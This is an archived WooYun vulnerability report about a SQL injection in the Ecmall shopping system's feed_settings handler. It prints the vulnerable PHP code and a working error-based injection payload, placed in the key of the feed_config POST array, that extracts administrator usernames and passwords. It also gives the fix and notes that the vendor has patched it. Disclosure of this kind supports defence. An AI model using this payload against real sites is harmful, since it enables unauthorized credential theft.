乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-18: 细节已通知厂商并且等待厂商处理中 2014-06-20: 厂商已经确认,细节仅向厂商公开 2014-06-23: 细节向第三方安全合作伙伴开放 2014-08-14: 细节向核心白帽子及相关领域专家公开 2014-08-24: 细节向普通白帽子公开 2014-09-03: 细节向实习白帽子公开 2014-09-16: 细节向公众公开
应该是这里的最后一处了
漏洞原理同 WooYun: Ecmall SQL Injection 2 这次出现在app/member.app.php
/** * Feed设置 * * @author Garbin * @param * @return void **/ function feed_settings() { if (!IS_POST) { /* 当前位置 */ $this->_curlocal(LANG::get('member_center'), 'index.php?app=member', LANG::get('feed_settings')); /* 当前用户中心菜单 */ $this->_curitem('my_profile'); /* 当前所处子菜单 */ $this->_curmenu('feed_settings'); $this->_config_seo('title', Lang::get('user_center') . ' - ' . Lang::get('feed_settings')); $user_feed_config = $this->visitor->get('feed_config'); $default_feed_config = Conf::get('default_feed_config'); $feed_config = !$user_feed_config ? $default_feed_config : unserialize($user_feed_config); $buyer_feed_items = array( 'store_created' => Lang::get('feed_store_created.name'), 'order_created' => Lang::get('feed_order_created.name'), 'goods_collected' => Lang::get('feed_goods_collected.name'), 'store_collected' => Lang::get('feed_store_collected.name'), 'goods_evaluated' => Lang::get('feed_goods_evaluated.name'), 'groupbuy_joined' => Lang::get('feed_groupbuy_joined.name') ); $seller_feed_items = array( 'goods_created' => Lang::get('feed_goods_created.name'), 'groupbuy_created' => Lang::get('feed_groupbuy_created.name'), ); $feed_items = $buyer_feed_items; if ($this->visitor->get('manage_store')) { $feed_items = array_merge($feed_items, $seller_feed_items); } $this->assign('feed_items', $feed_items); $this->assign('feed_config', $feed_config); $this->display('member.feed_settings.html'); } else { $feed_settings = serialize($_POST['feed_config']); //问题出现在feed_config参数上 $m_member = &m('member'); $m_member->edit($this->visitor->get('user_id'), array( 'feed_config' => $feed_settings, )); $this->show_message('feed_settings_successfully'); } }
http://localhost/ecmall/index.php?app=member&act=feed_settingspost提交数据:
feed_config[1'or (SELECT 1 FROM(SELECT count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))x from information_schema.tables group by x)a)#]=v
管理员账户密码:
修复同 WooYun: Ecmall SQL Injection 2 对feed_config的key进行危险字符过滤
危害等级:低
漏洞Rank:1
确认时间:2014-06-20 11:39
非常感谢您为shopex信息安全做的贡献该漏洞在新版本中已经修复,请及时更新非常感谢
暂无